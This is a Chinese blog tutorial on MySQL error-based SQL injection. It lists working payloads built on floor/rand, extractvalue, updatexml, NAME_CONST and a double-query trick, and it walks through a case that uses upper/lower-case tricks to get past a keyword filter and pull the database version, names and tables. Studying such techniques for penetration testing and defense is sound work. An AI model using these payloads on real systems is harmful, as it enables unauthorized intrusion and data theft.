码迷,mamicode.com
首页 > 数据库 > 详细

SQL注入之mysql显错注入

时间:2017-09-04 00:01:20      阅读:389      评论:0      收藏:0      [点我收藏+]

标签:显错注入   sql注入   mysql注入   

    在我们实际渗透中,明明发现一个注入点,本以为丢给sqlmap就可以了,结果sqlmap只显示确实是注入点,但是数据库却获取不了,如图1所示,这时我们可以使用手工进行注入,判断出过滤规则以及基本过滤情况,然后再选择对应的sqlmap脚本(如果有的话),本文主要是讲述如何通过mysql函数报错来进行注入,另外如何使用手工进行全程注入的利用过程,如果你知道sqlmap里面有对应的脚本的话,烦请告知一下,谢谢!。

技术分享

图1 获取数据库失败

    此时我们可以考虑下是否是显错注入,对于显错注入我们可以使用mysql显错注入函数进行查询数据库信息。

    通过floor报错:

and select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a)
and (select count(*) from (select 1 union select null union select  !1)x group by concat((select version()),floor(rand(0)*2)))

    通过ExtractValue报错:

and extractvalue(1, concat(0x7f, (select version()),0x7f))

    通过UpdateXml报错:

and 1=(updatexml(1,concat(0x7f,(select version()),0x7f),1))

    通过NAME_CONST报错:

and 1=(select * from (select NAME_CONST(version(),1),NAME_CONST(version(),1)) as x)

    通过错误的双重查询:

or 1 group by concat_ws(0x7f,version(),floor(rand(0)*2)) having min(0) or 1

    在这里我们以UpdateXml报错进行实战演示,如图2是一个显错注入点。

技术分享

图2 显错注入点

    此时我们将通过UpdateXml来进行SQL注入,这里由于对关键字进行了过滤,因此我们需要使用大小写来进行绕过,首先我们查询数据库版本,如图3所示,成功获取了数据库版本。

技术分享

图3 获取数据库版本信息

    获取数据库名,如图4所示。

技术分享

图4 获取数据名

    获取表名,如图5所示。

技术分享

图5 获取表名

    后续操作请参考文章《mysql手工注入》,这里不再进行累赘!

本文出自 “eth10” 博客,请务必保留此出处http://eth10.blog.51cto.com/13143704/1962253

SQL注入之mysql显错注入

标签:显错注入   sql注入   mysql注入   

原文地址:http://eth10.blog.51cto.com/13143704/1962253

(0)
(0)
   
举报
评论 一句话评论(0
登录后才能评论!
© 2014 mamicode.com 版权所有  联系我们:gaon5@hotmail.com
迷上了代码!